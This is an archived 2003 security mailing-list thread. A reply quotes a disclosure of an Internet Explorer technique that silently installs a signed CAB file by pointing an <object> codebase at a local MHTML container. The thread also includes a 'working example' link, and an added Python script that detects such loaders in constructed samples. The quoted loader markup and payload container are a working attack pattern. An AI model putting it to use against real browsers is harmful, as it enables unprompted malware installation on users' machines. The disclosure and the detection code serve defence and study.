From: guninski at guninski.com (Georgi Guninski)
Subject: SILLY BEHAVIOR Part III : Internet Explorer 5.5 - 6.0

Have the users at Microsoft fixed reinstalling of bugware signed by them?
outlctl.dll (amongst other stuff) used to be a disguised frontend to cmd.exe and 
was quite signed.
IIRC at a time Microsoft even wrote in a security bulletin: "remove us from the 
trusted publishers in exploder" - has this changed, i.e. are they *now* claiming
they are a trustworthy publisher again?

Georgi

http-equiv@...ite.com wrote:
> Sunday, May 4, 2003
> 
> 
> Silent delivery and installation of an executable on the target 
> machine, default install of win98 and Internet Explorer with all 
> patches to date. No client input other than viewing a web page:
> 
> Mildly amused by the recent patching of the codebase saga spanning 
> nearly 3 years now, we put on our thinking caps and came to the very 
> simple, yet delicious conclusion:
> 
> As below we are able to inject arbitrary html into the local computer 
> zone thus bypassing the browser's security. Nevertheless the codebase 
> exploits as detailed time and time again, now no longer function, 
> returning the standard active x error or security warning.
> 
> BUT !
> 
> there is a very specific reason for that and to bypass it, we do like 
> so:
> 
> ----local.html----
> 
> <object CLASSID="CLSID:55555555-5555" codebase="mhtml:file:///C:\WINDOWS\Temp\wecerr.txt!File://malware.cab">
> 
> ----local.html----
> 
> and where our:
> 
> ---wecerr.txt---
> MIME-Version: 1.0
> Content-Location:File://malware.cab
> Content-Transfer-Encoding: base64
> 
> TVNDRgAAAAAyQAYAAAAAAEQAAAAAAAAAAwEBAAIABADJBwAAFAAAAAAAEAAyQAYAgBUAAAAAAAAA
> 
> ---wecerr.txt---
> 
> contains a "signed" cab file.  The digital signature is our key.
> 
> Provided the executable is signed, we are again able to install via 
> the codebase object, from the local machine and without any prompts 
> or warnings. Certainly we would not expect malware to be digitally 
> signed out in the wild, but for what it is worth, we are back in 
> business.
> 
> Working Example
> 
> http://www.malware.com/aha.html
> 
> Caution:
> 
> a) for demonstration purposes we use the ubiquitous flash file [.cab 
> file] as it is both signed and benign and you are able to visually 
> see the install:
> 
> [screen shot: http://www.malware.com/aha.png 14KB]
> 
> b) the custom crafted wecerr.txt weighs in at a hefty 555 KB, and can 
> take a short while to download:
> 
> [screen shot: http://www.malware.com/ah.png 4KB]
> 
> once downloaded, simply take the:
> 
> ----local.html----
> 
> <object CLASSID="CLSID:55555555-5555" codebase="mhtml:file:///C:\WINDOWS\Temp\wecerr.txt!File://malware.cab">
> 
> ----local.html----
> 
> and away you go.
> 
> Notes:
> 
> 1. None
> 
> End Call
> 

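The technique quoted above has two moving parts: a local MIME (MHTML) container whose Content-Location claims to be a .cab, and an <object> whose codebase selects that part with the mhtml:<container>!<part> form. The script below is an added detection example written for this archive page; it is not code from the original post or from Georgi's reply. The sample MHTML and HTML it scans are constructed here to mirror the post, the "cabinet" inside is only the MSCF magic plus padding (not a real cabinet), and the function names are this example's own.

```python
"""Spot the MHTML-as-local-codebase loader described in the post.

Added example for this archive page, not the original poster's code.
The samples below are constructed to mirror the quoted local.html and
wecerr.txt; they are not the files from malware.com.
"""
import base64
import re
from email import message_from_string

CAB_MAGIC = b"MSCF"  # first four bytes of every Microsoft cabinet file

# Constructed stand-in for wecerr.txt: one base64 part whose
# Content-Location claims to be a .cab. The payload is a fake cabinet
# header (magic plus zero padding), not a real cabinet.
FAKE_CAB = CAB_MAGIC + b"\x00" * 28
SAMPLE_MHTML = (
    "MIME-Version: 1.0\n"
    "Content-Location: File://malware.cab\n"
    "Content-Transfer-Encoding: base64\n"
    "\n"
    + base64.b64encode(FAKE_CAB).decode() + "\n"
)

# Constructed stand-in for local.html: the <object> whose codebase points
# into the local MHTML container using the mhtml:...!... part selector.
SAMPLE_HTML = (
    '<object CLASSID="CLSID:55555555-5555" '
    'codebase="mhtml:file:///C:\\WINDOWS\\Temp\\wecerr.txt!File://malware.cab">'
)

CODEBASE_RE = re.compile(r'codebase\s*=\s*"([^"]*)"', re.IGNORECASE)


def find_mhtml_codebases(html):
    """Return (container, part) for every codebase of the form
    mhtml:<container>!<part> whose container is a local file: URL."""
    hits = []
    for value in CODEBASE_RE.findall(html):
        if not value.lower().startswith("mhtml:") or "!" not in value:
            continue
        container, part = value[len("mhtml:"):].split("!", 1)
        if container.lower().startswith("file:"):
            hits.append((container, part))
    return hits


def extract_cab_parts(mhtml_text):
    """Walk the MIME parts of an MHTML document and return
    (content_location, decoded_bytes) for every base64 part whose
    decoded body starts with the cabinet magic."""
    msg = message_from_string(mhtml_text)
    found = []
    for part in msg.walk():  # yields the message itself when not multipart
        if part.get("Content-Transfer-Encoding", "").lower() != "base64":
            continue
        try:
            body = base64.b64decode(part.get_payload())
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if body.startswith(CAB_MAGIC):
            found.append((part.get("Content-Location", ""), body))
    return found


def resolve_loader(html, containers):
    """Cross-check each mhtml: codebase against the container it names.

    `containers` maps a container URL, exactly as written in the codebase,
    to that file's MHTML text. Returns the (container, part) pairs whose
    referenced part really is a cabinet, i.e. a confirmed loader."""
    confirmed = []
    for container, part in find_mhtml_codebases(html):
        text = containers.get(container)
        if text is None:
            continue
        for location, _body in extract_cab_parts(text):
            if location.lower() == part.lower():
                confirmed.append((container, part))
    return confirmed


if __name__ == "__main__":
    store = {"file:///C:\\WINDOWS\\Temp\\wecerr.txt": SAMPLE_MHTML}
    for container, part in resolve_loader(SAMPLE_HTML, store):
        print("cabinet", part, "served out of local container", container)
```

The check deliberately keys on the two things the post says make the trick work: the container being a local file: URL (so the object loads from the Local Machine zone) and the selected part decoding to a real cabinet. A signed-but-unexpected cabinet in a text file under a temp directory is the artifact to hunt for; the Authenticode signature the post relies on is checked by the browser, not by this script.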

